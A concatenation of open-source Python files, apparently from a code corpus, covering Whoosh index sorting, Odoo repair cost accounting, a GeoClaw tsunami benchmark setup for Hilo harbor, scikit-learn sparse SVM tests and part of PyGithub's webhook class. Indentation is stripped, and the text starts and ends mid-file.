>>> from whoosh import index, sorting
>>> ix = index.open_dir("indexdir")
>>> with ix.writer() as w:
... facet = sorting.FieldFacet("price")
... sorting.add_sortable(w, "price", facet)
...
:param writer: a :class:`whoosh.writing.IndexWriter` object.
:param fieldname: the name of the field to add the per-document sortable
values to. If this field doesn't exist in the writer's schema, the
function will add a :class:`whoosh.fields.COLUMN` field to the schema,
and you must specify the column object to using the ``column`` keyword
argument.
:param facet: a :class:`FacetType` object to use to generate the
per-document values.
:param column: a :class:`whosh.columns.ColumnType` object to use to store
the per-document values. If you don't specify a column object, the
function will use the default column type for the given field.
"""
storage = writer.storage
schema = writer.schema
field = None
if fieldname in schema:
field = schema[fieldname]
if field.column_type:
raise Exception("%r field is already sortable" % fieldname)
if column:
if fieldname not in schema:
from whoosh.fields import COLUMN
field = COLUMN(column)
schema.add(fieldname, field)
else:
if fieldname in schema:
column = field.default_column()
else:
raise Exception("Field %r does not exist" % fieldname)
searcher = writer.searcher()
catter = facet.categorizer(searcher)
for subsearcher, docoffset in searcher.leaf_searchers():
catter.set_searcher(subsearcher, docoffset)
reader = subsearcher.reader()
if reader.has_column(fieldname):
raise Exception("%r field already has a column" % fieldname)
codec = reader.codec()
segment = reader.segment()
colname = codec.column_filename(segment, fieldname)
colfile = storage.create_file(colname)
try:
colwriter = column.writer(colfile)
for docnum in reader.all_doc_ids():
v = catter.key_to_name(catter.key_for(None, docnum))
cv = field.to_column_value(v)
colwriter.add(docnum, cv)
colwriter.finish(reader.doc_count_all())
finally:
colfile.close()
field.column_type = column
| bsd-3-clause |
factorlibre/odoomrp-wip | mrp_repair_analytic/models/mrp_repair.py | 6 | 5544 | # -*- coding: utf-8 -*-
# © 2015 Ainara Galdona - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import models, fields, api, exceptions, _
from openerp.addons import decimal_precision as dp
class MrpRepair(models.Model):
_inherit = 'mrp.repair'
analytic_account = fields.Many2one(
'account.analytic.account', domain=[('type', '!=', 'view')],
string='Analytic Account')
@api.multi
def create_repair_cost(self):
analytic_line_obj = self.env['account.analytic.line']
for record in self:
if not record.analytic_account:
continue
lines = record.analytic_account.line_ids.filtered(
lambda x: x.is_repair_cost and x.amount != 0 and
x.repair_id.id == record.id)
lines.unlink()
for line in record.fees_lines.filtered('load_cost'):
vals = record._catch_repair_line_information_for_analytic(line)
if vals:
analytic_line_obj.create(vals)
for line in record.operations.filtered(
lambda x: x.load_cost and x.type == 'add'):
vals = record._catch_repair_line_information_for_analytic(line)
if vals:
analytic_line_obj.create(vals)
@api.model
def action_repair_end(self):
result = super(MrpRepair, self).action_repair_end()
self.create_repair_cost()
return result
def _catch_repair_line_information_for_analytic(self, line):
analytic_line_obj = self.env['account.analytic.line']
journal = self.env.ref('mrp.analytic_journal_repair', False)
if not journal:
raise exceptions.Warning(_('Error!: Repair journal not found'))
name = self.name
if line.product_id.default_code:
name += ' - ' + line.product_id.default_code
categ_id = line.product_id.categ_id
general_account = (line.product_id.property_account_income or
categ_id.property_account_income_categ or False)
amount = line.cost_subtotal * -1
if not amount:
return False
vals = {'name': name,
'user_id': line.user_id.id,
'date': analytic_line_obj._get_default_date(),
'product_id': line.product_id.id,
'unit_amount': line.product_uom_qty,
'product_uom_id': line.product_uom.id,
'amount': amount,
'journal_id': journal.id,
'account_id': self.analytic_account.id,
'is_repair_cost': True,
'general_account_id': general_account.id,
'repair_id': line.repair_id.id,
}
return vals
@api.multi
def action_invoice_create(self, group=False):
res = super(MrpRepair, self).action_invoice_create(group=group)
for record in self.filtered('analytic_account'):
record.mapped('fees_lines.invoice_line_id').write(
{'account_analytic_id': record.analytic_account.id})
record.mapped('operations.invoice_line_id').write(
{'account_analytic_id': record.analytic_account.id})
return res
class MrpRepairLine(models.Model):
_inherit = 'mrp.repair.line'
@api.multi
@api.depends('product_id', 'product_uom_qty', 'lot_id')
def _compute_cost_subtotal(self):
for line in self:
std_price = 0
if line.product_id.cost_method == 'real' and line.lot_id:
quants = line.lot_id.quant_ids.filtered(
lambda x: x.location_id.usage == 'internal')
if quants:
std_price = quants[:1].cost
else:
std_price = line.product_id.standard_price
line.standard_price = std_price
line.cost_subtotal = std_price * line.product_uom_qty
standard_price = fields.Float(
string='Cost Price', digits=dp.get_precision('Account'),
compute='_compute_cost_subtotal', store=True)
cost_subtotal = fields.Float(
string='Cost Subtotal', digits=dp.get_precision('Account'),
compute='_compute_cost_subtotal', store=True)
user_id = fields.Many2one('res.users', string='User', required=True,
default=lambda self: self.env.user)
load_cost = fields.Boolean(string='Load Cost', default=True)
class MrpRepairFee(models.Model):
_inherit = 'mrp.repair.fee'
@api.multi
@api.depends('product_id', 'product_uom_qty')
def _compute_cost_subtotal(self):
for fee in self:
fee.standard_price = fee.product_id.standard_price
fee.cost_subtotal = (fee.product_id.standard_price *
fee.product_uom_qty)
user_id = fields.Many2one('res.users', string='User', required=True,
default=lambda self: self.env.user)
load_cost = fields.Boolean(string='Load Cost', default=True)
# Computed field and not related. Because only has to be reloaded when a
# product or quantity is changed but not if products price is changed
standard_price = fields.Float(
string='Cost Price', digits=dp.get_precision('Account'),
compute='_compute_cost_subtotal', store=True)
cost_subtotal = fields.Float(
string='Cost Subtotal', digits=dp.get_precision('Account'),
compute='_compute_cost_subtotal', store=True)
| agpl-3.0 |
rjleveque/tsunami_benchmarks | nthmp_currents_2015/problem2/harbor1/setrun.py | 2 | 14360 | """
Module to set up run time parameters for Clawpack -- AMRClaw code.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy as np
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
"""
Define the parameters used for running Clawpack.
INPUT:
claw_pkg expected to be "geoclaw" for this setrun.
OUTPUT:
rundata - object of class ClawRunData
"""
from clawpack.clawutil import data
assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
num_dim = 2
rundata = data.ClawRunData(claw_pkg, num_dim)
#------------------------------------------------------------------
# Problem-specific parameters to be written to setprob.data:
#------------------------------------------------------------------
#probdata = rundata.new_UserData(name='probdata',fname='setprob.data')
#------------------------------------------------------------------
# GeoClaw specific parameters:
#------------------------------------------------------------------
rundata = setgeo(rundata)
#------------------------------------------------------------------
# Standard Clawpack parameters to be written to claw.data:
#------------------------------------------------------------------
clawdata = rundata.clawdata # initialized when rundata instantiated
# Set single grid parameters first.
# See below for AMR parameters.
# ---------------
# Spatial domain:
# ---------------
# Number of space dimensions:
clawdata.num_dim = num_dim
# Lower and upper edge of computational domain:
clawdata.lower[0] = 204.905 # xlower
clawdata.upper[0] = 204.965 # xupper
clawdata.lower[1] = 19.71 # ylower
clawdata.upper[1] = 19.758 # yupper
# Number of grid cells:
clawdata.num_cells[0] = 108 # 2-sec # mx
clawdata.num_cells[1] = 88 # my
# ---------------
# Size of system:
# ---------------
# Number of equations in the system:
clawdata.num_eqn = 3
# Number of auxiliary variables in the aux array (initialized in setaux)
clawdata.num_aux = 3
# Index of aux array corresponding to capacity function, if there is one:
clawdata.capa_index = 2
# -------------
# Initial time:
# -------------
clawdata.t0 = 0.0
# Restart from checkpoint file of a previous run?
# Note: If restarting, you must also change the Makefile to set:
# RESTART = True
# If restarting, t0 above should be from original run, and the
# restart_file 'fort.chkNNNNN' specified below should be in
# the OUTDIR indicated in Makefile.
clawdata.restart = False # True to restart from prior results
clawdata.restart_file = 'fort.chk00006' # File to use for restart data
# -------------
# Output times:
#--------------
# Specify at what times the results should be written to fort.q files.
# Note that the time integration stops after the final output time.
clawdata.output_style = 1
if clawdata.output_style==1:
# Output ntimes frames at equally spaced times up to tfinal:
# Can specify num_output_times = 0 for no output
clawdata.num_output_times = 14
clawdata.tfinal = 7*3600.
clawdata.output_t0 = True # output at initial (or restart) time?
elif clawdata.output_style == 2:
# Specify a list or numpy array of output times:
# Include t0 if you want output at the initial time.
clawdata.output_times = 3600. * np.linspace(1,4,97)
elif clawdata.output_style == 3:
# Output every step_interval timesteps over total_steps timesteps:
clawdata.output_step_interval = 1
clawdata.total_steps = 10
clawdata.output_t0 = False # output at initial (or restart) time?
clawdata.output_format = 'binary' # 'ascii', 'binary', 'netcdf'
clawdata.output_q_components = 'all' # could be list such as [True,True]
clawdata.output_aux_components = 'none' # could be list
clawdata.output_aux_onlyonce = True # output aux arrays only at t0
# ---------------------------------------------------
# Verbosity of messages to screen during integration:
# ---------------------------------------------------
# The current t, dt, and cfl will be printed every time step
# at AMR levels <= verbosity. Set verbosity = 0 for no printing.
# (E.g. verbosity == 2 means print only on levels 1 and 2.)
clawdata.verbosity = 0
# --------------
# Time stepping:
# --------------
# if dt_variable==True: variable time steps used based on cfl_desired,
# if dt_variable==Falseixed time steps dt = dt_initial always used.
clawdata.dt_variable = True
# Initial time step for variable dt.
# (If dt_variable==0 then dt=dt_initial for all steps)
clawdata.dt_initial = 0.016
# Max time step to be allowed if variable dt used:
clawdata.dt_max = 1e+99
# Desired Courant number if variable dt used
clawdata.cfl_desired = 0.75
# max Courant number to allow without retaking step with a smaller dt:
clawdata.cfl_max = 1.0
# Maximum number of time steps to allow between output times:
clawdata.steps_max = 50000
# ------------------
# Method to be used:
# ------------------
# Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
clawdata.order = 2
# Use dimensional splitting? (not yet available for AMR)
clawdata.dimensional_split = 'unsplit'
# For unsplit method, transverse_waves can be
# 0 or 'none' ==> donor cell (only normal solver used)
# 1 or 'increment' ==> corner transport of waves
# 2 or 'all' ==> corner transport of 2nd order corrections too
clawdata.transverse_waves = 2
# Number of waves in the Riemann solution:
clawdata.num_waves = 3
# List of limiters to use for each wave family:
# Required: len(limiter) == num_waves
# Some options:
# 0 or 'none' ==> no limiter (Lax-Wendroff)
# 1 or 'minmod' ==> minmod
# 2 or 'superbee' ==> superbee
# 3 or 'vanleer' ==> van Leer
# 4 or 'mc' ==> MC limiter
clawdata.limiter = ['vanleer', 'vanleer', 'vanleer']
clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
# Source terms splitting:
# src_split == 0 or 'none' ==> no source term (src routine never called)
# src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
# src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
clawdata.source_split = 1
# --------------------
# Boundary conditions:
# --------------------
# Number of ghost cells (usually 2)
clawdata.num_ghost = 2
# Choice of BCs at xlower and xupper:
# 0 or 'user' => user specified (must modify bcNamr.f to use this option)
# 1 or 'extrap' => extrapolation (non-reflecting outflow)
# 2 or 'periodic' => periodic (must specify this at both boundaries)
# 3 or 'wall' => solid wall for systems where q(2) is normal velocity
clawdata.bc_lower[0] = 'extrap' # at xlower
clawdata.bc_upper[0] = 'extrap' # at xupper
clawdata.bc_lower[1] = 'extrap' # at ylower
clawdata.bc_upper[1] = 'user' # at yupper
# ---------------
# Gauges:
# ---------------
gauges = rundata.gaugedata.gauges
# for gauges append lines of the form [gaugeno, x, y, t1, t2]
gauges.append([1125, 204.91802, 19.74517, 0., 1.e9]) #Hilo
gauges.append([1126, 204.93003, 19.74167, 0., 1.e9]) #Hilo
# gauges.append([11261, 204.93003, 19.739, 0., 1.e9])
# #Hilo
# Tide gauge:
gauges.append([7760, 204.9437, 19.7306, 0., 1.e9]) # Hilo
gauges.append([7761, 204.9447, 19.7308, 0., 1.e9]) # From Benchmark descr.
gauges.append([7762, 204.9437, 19.7307, 0., 1.e9]) # Shift so depth > 0
# Gauge at point requested by Pat Lynett:
gauges.append([3333, 204.93, 19.7576, 0., 1.e9])
if 0:
# Array of synthetic gauges originally used to find S2 location:
dx = .0005
for i in range(6):
x = 204.93003 - i*dx
for j in range(5):
y = 19.74167 + (j-2)*dx
gauges.append([10*(j+1)+i+1, x, y, 0., 1.e9])
# --------------
# Checkpointing:
# --------------
# Specify when checkpoint files should be created that can be
# used to restart a computation.
clawdata.checkpt_style = 0
if clawdata.checkpt_style == 0:
# Do not checkpoint at all
pass
elif clawdata.checkpt_style == 1:
# Checkpoint only at tfinal.
pass
elif clawdata.checkpt_style == 2:
# Specify a list of checkpoint times.
clawdata.checkpt_times = np.array([7.5,8,8.5,9,9.5]) * 3600.
elif clawdata.checkpt_style == 3:
# Checkpoint every checkpt_interval timesteps (on Level 1)
# and at the final time.
clawdata.checkpt_interval = 5
# ---------------
# AMR parameters: (written to amr.data)
# ---------------
amrdata = rundata.amrdata
# max number of refinement levels:
amrdata.amr_levels_max = 3
# List of refinement ratios at each level (length at least amr_level_max-1)
amrdata.refinement_ratios_x = [2,3]
amrdata.refinement_ratios_y = [2,3]
amrdata.refinement_ratios_t = [2,3]
# Specify type of each aux variable in amrdata.auxtype.
# This must be a list of length num_aux, each element of which is one of:
# 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
amrdata.aux_type = ['center', 'capacity', 'yleft']
# Flag for refinement based on Richardson error estimater:
amrdata.flag_richardson = False # use Richardson?
amrdata.flag_richardson_tol = 1.0 # Richardson tolerance
# Flag for refinement using routine flag2refine:
amrdata.flag2refine = True # use this?
amrdata.flag2refine_tol = 0.5 # tolerance used in this routine
# Note: in geoclaw the refinement tolerance is set as wave_tolerance below
# and flag2refine_tol is unused!
# steps to take on each level L between regriddings of level L+1:
amrdata.regrid_interval = 3
# width of buffer zone around flagged points:
# (typically the same as regrid_interval so waves don't escape):
amrdata.regrid_buffer_width = 2
# clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
# (closer to 1.0 => more small grids may be needed to cover flagged cells)
amrdata.clustering_cutoff = 0.7
# print info about each regridding up to this level:
amrdata.verbosity_regrid = 0
# ---------------
# Regions:
# ---------------
regions = rundata.regiondata.regions
regions.append([1, 1, 0., 1e9, 0, 360, -90, 90])
regions.append([1, 2, 0., 1e9, 204.9, 204.95, 19.7, 19.754])
regions.append([1, 3, 0., 1e9, 204.9, 204.95, 19.7, 19.751])
regions.append([1, 4, 0., 1e9, 204.9, 204.95, 19.72, 19.748])
# ----- For developers -----
# Toggle debugging print statements:
amrdata.dprint = False # print domain flags
amrdata.eprint = False # print err est flags
amrdata.edebug = False # even more err est flags
amrdata.gprint = False # grid bisection/clustering
amrdata.nprint = False # proper nesting output
amrdata.pprint = False # proj. of tagged points
amrdata.rprint = False # print regridding summary
amrdata.sprint = False # space/memory output
amrdata.tprint = False # time step reporting each level
amrdata.uprint = False # update/upbnd reporting
return rundata
# end of function setrun
# ----------------------
#-------------------
def setgeo(rundata):
#-------------------
"""
Set GeoClaw specific runtime parameters.
"""
try:
geo_data = rundata.geo_data
except:
print "*** Error, this rundata has no geo_data attribute"
raise AttributeError("Missing geo_data attribute")
# == Physics ==
geo_data.gravity = 9.81
geo_data.coordinate_system = 2
geo_data.earth_radius = 6367500.0
# == Forcing Options
geo_data.coriolis_forcing = False
# == Algorithm and Initial Conditions ==
geo_data.sea_level = 0.
geo_data.dry_tolerance = 0.001
geo_data.friction_forcing = True
geo_data.manning_coefficient = 0.025
geo_data.friction_depth = 500.0
# Refinement settings
refinement_data = rundata.refinement_data
refinement_data.variable_dt_refinement_ratios = True
refinement_data.wave_tolerance = 0.02
refinement_data.deep_depth = 200.0
refinement_data.max_level_deep = 4
# == settopo.data values ==
topofiles = rundata.topo_data.topofiles
topodir = '../'
topofiles.append([2, 1, 1, 0.0, 1e10, topodir+'hilo_flattened.tt2'])
topofiles.append([2, 1, 1, 0.0, 1e10, topodir+'flat.tt2'])
# == setdtopo.data values ==
#rundata.dtopo_data.dtopofiles = [[1, 3, 3, topodir + 'Fujii.txydz']]
# == setqinit.data values ==
rundata.qinit_data.qinit_type = 0
rundata.qinit_data.qinitfiles = []
# == fixedgrids.data values ==
rundata.fixed_grid_data.fixedgrids = []
fixedgrids = rundata.fixed_grid_data.fixedgrids
# == fgmax.data values ==
fgmax_files = rundata.fgmax_data.fgmax_files
# for fixed grids append to this list names of any fgmax input files
fgmax_files.append('fgmax_grid.txt')
rundata.fgmax_data.num_fgmax_val = 2
return rundata
# end of function setgeo
# ----------------------
if __name__ == '__main__':
# Set up run-time parameters and write all data files.
import sys
rundata = setrun(*sys.argv[1:])
rundata.write()
from clawpack.geoclaw import kmltools
kmltools.regions2kml()
kmltools.gauges2kml()
| bsd-3-clause |
simon-pepin/scikit-learn | sklearn/svm/tests/test_sparse.py | 95 | 12156 | from nose.tools import assert_raises, assert_true, assert_false
import numpy as np
from scipy import sparse
from numpy.testing import (assert_array_almost_equal, assert_array_equal,
assert_equal)
from sklearn import datasets, svm, linear_model, base
from sklearn.datasets import make_classification, load_digits, make_blobs
from sklearn.svm.tests import test_svm
from sklearn.utils import ConvergenceWarning
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.testing import assert_warns, assert_raise_message
# test sample 1
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
X_sp = sparse.lil_matrix(X)
Y = [1, 1, 1, 2, 2, 2]
T = np.array([[-1, -1], [2, 2], [3, 2]])
true_result = [1, 2, 2]
# test sample 2
X2 = np.array([[0, 0, 0], [1, 1, 1], [2, 0, 0, ],
[0, 0, 2], [3, 3, 3]])
X2_sp = sparse.dok_matrix(X2)
Y2 = [1, 2, 2, 2, 3]
T2 = np.array([[-1, -1, -1], [1, 1, 1], [2, 2, 2]])
true_result2 = [1, 2, 3]
iris = datasets.load_iris()
# permute
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# sparsify
iris.data = sparse.csr_matrix(iris.data)
def check_svm_model_equal(dense_svm, sparse_svm, X_train, y_train, X_test):
dense_svm.fit(X_train.toarray(), y_train)
if sparse.isspmatrix(X_test):
X_test_dense = X_test.toarray()
else:
X_test_dense = X_test
sparse_svm.fit(X_train, y_train)
assert_true(sparse.issparse(sparse_svm.support_vectors_))
assert_true(sparse.issparse(sparse_svm.dual_coef_))
assert_array_almost_equal(dense_svm.support_vectors_,
sparse_svm.support_vectors_.toarray())
assert_array_almost_equal(dense_svm.dual_coef_, sparse_svm.dual_coef_.toarray())
if dense_svm.kernel == "linear":
assert_true(sparse.issparse(sparse_svm.coef_))
assert_array_almost_equal(dense_svm.coef_, sparse_svm.coef_.toarray())
assert_array_almost_equal(dense_svm.support_, sparse_svm.support_)
assert_array_almost_equal(dense_svm.predict(X_test_dense), sparse_svm.predict(X_test))
assert_array_almost_equal(dense_svm.decision_function(X_test_dense),
sparse_svm.decision_function(X_test))
assert_array_almost_equal(dense_svm.decision_function(X_test_dense),
sparse_svm.decision_function(X_test_dense))
assert_array_almost_equal(dense_svm.predict_proba(X_test_dense),
sparse_svm.predict_proba(X_test), 4)
msg = "cannot use sparse input in 'SVC' trained on dense data"
if sparse.isspmatrix(X_test):
assert_raise_message(ValueError, msg, dense_svm.predict, X_test)
def test_svc():
"""Check that sparse SVC gives the same result as SVC"""
# many class dataset:
X_blobs, y_blobs = make_blobs(n_samples=100, centers=10, random_state=0)
X_blobs = sparse.csr_matrix(X_blobs)
datasets = [[X_sp, Y, T], [X2_sp, Y2, T2],
[X_blobs[:80], y_blobs[:80], X_blobs[80:]],
[iris.data, iris.target, iris.data]]
kernels = ["linear", "poly", "rbf", "sigmoid"]
for dataset in datasets:
for kernel in kernels:
clf = svm.SVC(kernel=kernel, probability=True, random_state=0)
sp_clf = svm.SVC(kernel=kernel, probability=True, random_state=0)
check_svm_model_equal(clf, sp_clf, *dataset)
def test_unsorted_indices():
# test that the result with sorted and unsorted indices in csr is the same
# we use a subset of digits as iris, blobs or make_classification didn't
# show the problem
digits = load_digits()
X, y = digits.data[:50], digits.target[:50]
X_test = sparse.csr_matrix(digits.data[50:100])
X_sparse = sparse.csr_matrix(X)
coef_dense = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X, y).coef_
sparse_svc = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X_sparse, y)
coef_sorted = sparse_svc.coef_
# make sure dense and sparse SVM give the same result
assert_array_almost_equal(coef_dense, coef_sorted.toarray())
X_sparse_unsorted = X_sparse[np.arange(X.shape[0])]
X_test_unsorted = X_test[np.arange(X_test.shape[0])]
# make sure we scramble the indices
assert_false(X_sparse_unsorted.has_sorted_indices)
assert_false(X_test_unsorted.has_sorted_indices)
unsorted_svc = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X_sparse_unsorted, y)
coef_unsorted = unsorted_svc.coef_
# make sure unsorted indices give same result
assert_array_almost_equal(coef_unsorted.toarray(), coef_sorted.toarray())
assert_array_almost_equal(sparse_svc.predict_proba(X_test_unsorted),
sparse_svc.predict_proba(X_test))
def test_svc_with_custom_kernel():
kfunc = lambda x, y: safe_sparse_dot(x, y.T)
clf_lin = svm.SVC(kernel='linear').fit(X_sp, Y)
clf_mylin = svm.SVC(kernel=kfunc).fit(X_sp, Y)
assert_array_equal(clf_lin.predict(X_sp), clf_mylin.predict(X_sp))
def test_svc_iris():
# Test the sparse SVC with the iris dataset
for k in ('linear', 'poly', 'rbf'):
sp_clf = svm.SVC(kernel=k).fit(iris.data, iris.target)
clf = svm.SVC(kernel=k).fit(iris.data.toarray(), iris.target)
assert_array_almost_equal(clf.support_vectors_,
sp_clf.support_vectors_.toarray())
assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.toarray())
assert_array_almost_equal(
clf.predict(iris.data.toarray()), sp_clf.predict(iris.data))
if k == 'linear':
assert_array_almost_equal(clf.coef_, sp_clf.coef_.toarray())
def test_sparse_decision_function():
#Test decision_function
#Sanity check, test that decision_function implemented in python
#returns the same as the one in libsvm
# multi class:
clf = svm.SVC(kernel='linear', C=0.1).fit(iris.data, iris.target)
dec = safe_sparse_dot(iris.data, clf.coef_.T) + clf.intercept_
assert_array_almost_equal(dec, clf.decision_function(iris.data))
# binary:
clf.fit(X, Y)
dec = np.dot(X, clf.coef_.T) + clf.intercept_
prediction = clf.predict(X)
assert_array_almost_equal(dec.ravel(), clf.decision_function(X))
assert_array_almost_equal(
prediction,
clf.classes_[(clf.decision_function(X) > 0).astype(np.int).ravel()])
expected = np.array([-1., -0.66, -1., 0.66, 1., 1.])
assert_array_almost_equal(clf.decision_function(X), expected, 2)
def test_error():
# Test that it gives proper exception on deficient input
# impossible value of C
assert_raises(ValueError, svm.SVC(C=-1).fit, X, Y)
# impossible value of nu
clf = svm.NuSVC(nu=0.0)
assert_raises(ValueError, clf.fit, X_sp, Y)
Y2 = Y[:-1] # wrong dimensions for labels
assert_raises(ValueError, clf.fit, X_sp, Y2)
clf = svm.SVC()
clf.fit(X_sp, Y)
assert_array_equal(clf.predict(T), true_result)
def test_linearsvc():
# Similar to test_SVC
clf = svm.LinearSVC(random_state=0).fit(X, Y)
sp_clf = svm.LinearSVC(random_state=0).fit(X_sp, Y)
assert_true(sp_clf.fit_intercept)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=4)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=4)
assert_array_almost_equal(clf.predict(X), sp_clf.predict(X_sp))
clf.fit(X2, Y2)
sp_clf.fit(X2_sp, Y2)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=4)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=4)
def test_linearsvc_iris():
# Test the sparse LinearSVC with the iris dataset
sp_clf = svm.LinearSVC(random_state=0).fit(iris.data, iris.target)
clf = svm.LinearSVC(random_state=0).fit(iris.data.toarray(), iris.target)
assert_equal(clf.fit_intercept, sp_clf.fit_intercept)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=1)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=1)
assert_array_almost_equal(
clf.predict(iris.data.toarray()), sp_clf.predict(iris.data))
# check decision_function
pred = np.argmax(sp_clf.decision_function(iris.data), 1)
assert_array_almost_equal(pred, clf.predict(iris.data.toarray()))
# sparsify the coefficients on both models and check that they still
# produce the same results
clf.sparsify()
assert_array_equal(pred, clf.predict(iris.data))
sp_clf.sparsify()
assert_array_equal(pred, sp_clf.predict(iris.data))
def test_weight():
# Test class weights
X_, y_ = make_classification(n_samples=200, n_features=100,
weights=[0.833, 0.167], random_state=0)
X_ = sparse.csr_matrix(X_)
for clf in (linear_model.LogisticRegression(),
svm.LinearSVC(random_state=0),
svm.SVC()):
clf.set_params(class_weight={0: 5})
clf.fit(X_[:180], y_[:180])
y_pred = clf.predict(X_[180:])
assert_true(np.sum(y_pred == y_[180:]) >= 11)
def test_sample_weights():
# Test weights on individual samples
clf = svm.SVC()
clf.fit(X_sp, Y)
assert_array_equal(clf.predict(X[2]), [1.])
sample_weight = [.1] * 3 + [10] * 3
clf.fit(X_sp, Y, sample_weight=sample_weight)
assert_array_equal(clf.predict(X[2]), [2.])
def test_sparse_liblinear_intercept_handling():
# Test that sparse liblinear honours intercept_scaling param
test_svm.test_dense_liblinear_intercept_handling(svm.LinearSVC)
def test_sparse_realdata():
# Test on a subset from the 20newsgroups dataset.
# This catchs some bugs if input is not correctly converted into
# sparse format or weights are not correctly initialized.
data = np.array([0.03771744, 0.1003567, 0.01174647, 0.027069])
indices = np.array([6, 5, 35, 31])
indptr = np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4])
X = sparse.csr_matrix((data, indices, indptr))
y = np.array(
[1., 0., 2., 2., 1., 1., 1., 2., 2., 0., 1., 2., 2.,
0., 2., 0., 3., 0., 3., 0., 1., 1., 3., 2., 3., 2.,
0., 3., 1., 0., 2., 1., 2., 0., 1., 0., 2., 3., 1.,
3., 0., 1., 0., 0., 2., 0., 1., 2., 2., 2., 3., 2.,
0., 3., 2., 1., 2., 3., 2., 2., 0., 1., 0., 1., 2.,
3., 0., 0., 2., 2., 1., 3., 1., 1., 0., 1., 2., 1.,
1., 3.])
clf = svm.SVC(kernel='linear').fit(X.toarray(), y)
sp_clf = svm.SVC(kernel='linear').fit(sparse.coo_matrix(X), y)
assert_array_equal(clf.support_vectors_, sp_clf.support_vectors_.toarray())
assert_array_equal(clf.dual_coef_, sp_clf.dual_coef_.toarray())
def test_sparse_svc_clone_with_callable_kernel():
# Test that the "dense_fit" is called even though we use sparse input
# meaning that everything works fine.
a = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
random_state=0)
b = base.clone(a)
b.fit(X_sp, Y)
pred = b.predict(X_sp)
b.predict_proba(X_sp)
dense_svm = svm.SVC(C=1, kernel=lambda x, y: np.dot(x, y.T),
probability=True, random_state=0)
pred_dense = dense_svm.fit(X, Y).predict(X)
assert_array_equal(pred_dense, pred)
# b.decision_function(X_sp) # XXX : should be supported
def test_timeout():
sp = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
random_state=0, max_iter=1)
assert_warns(ConvergenceWarning, sp.fit, X_sp, Y)
def test_consistent_proba():
a = svm.SVC(probability=True, max_iter=1, random_state=0)
proba_1 = a.fit(X, Y).predict_proba(X)
a = svm.SVC(probability=True, max_iter=1, random_state=0)
proba_2 = a.fit(X, Y).predict_proba(X)
assert_array_almost_equal(proba_1, proba_2)
| bsd-3-clause |
mcus/SickRage | lib/github/Hook.py | 72 | 8198 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 AKFish <akfish@gmail.com> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
import github.HookResponse
class Hook(github.GithubObject.CompletableGithubObject):
"""
This class represents Hooks as returned for example by http://developer.github.com/v3/repos/hooks
"""
@property
def active(self):
"""
:type: bool
"""
self._completeIfNotSet(self._active)
return self._active.value
@property
def config(self):
"""
:type: dict
"""
self._completeIfNotSet(self._config)
return self._config.value
@property
def created_at(self):
"""
:type: datetime.datetime
"""
self._completeIfNotSet(self._created_at)
return self._created_at.value
@property
def events(self):
"""
:type: list of string
"""
self._completeIfNotSet(self._events)
return self._events.value
@property
def id(self):
"""
:type: integer
"""
self._completeIfNotSet(self._id)
return self._id.value
@property
def last_response(self):
"""
:type: :class:`github.HookResponse.HookResponse`
"""
self._completeIfNotSet(self._last_response)
return self._last_response.value
@property
def name(self):
"""
:type: string
"""
self._completeIfNotSet(self._name)
return self._name.value
@property
def test_url(self):
"""
:type: string
"""
self._completeIfNotSet(self._test_url)
return self._test_url.value
@property
def updated_at(self):
"""
:type: datetime.datetime
"""
self._completeIfNotSet(self._updated_at)
return self._updated_at.value
@property
def url(self):
"""
:type: string
"""
self._completeIfNotSet(self._url)
return self._url.value
def delete(self):
"""
:calls: `DELETE /repos/:owner/:repo/hooks/:id <http://developer.github.com/v3/repos/hooks>`_
:rtype: None
"""
headers, data = self._requester.requestJsonAndCheck(
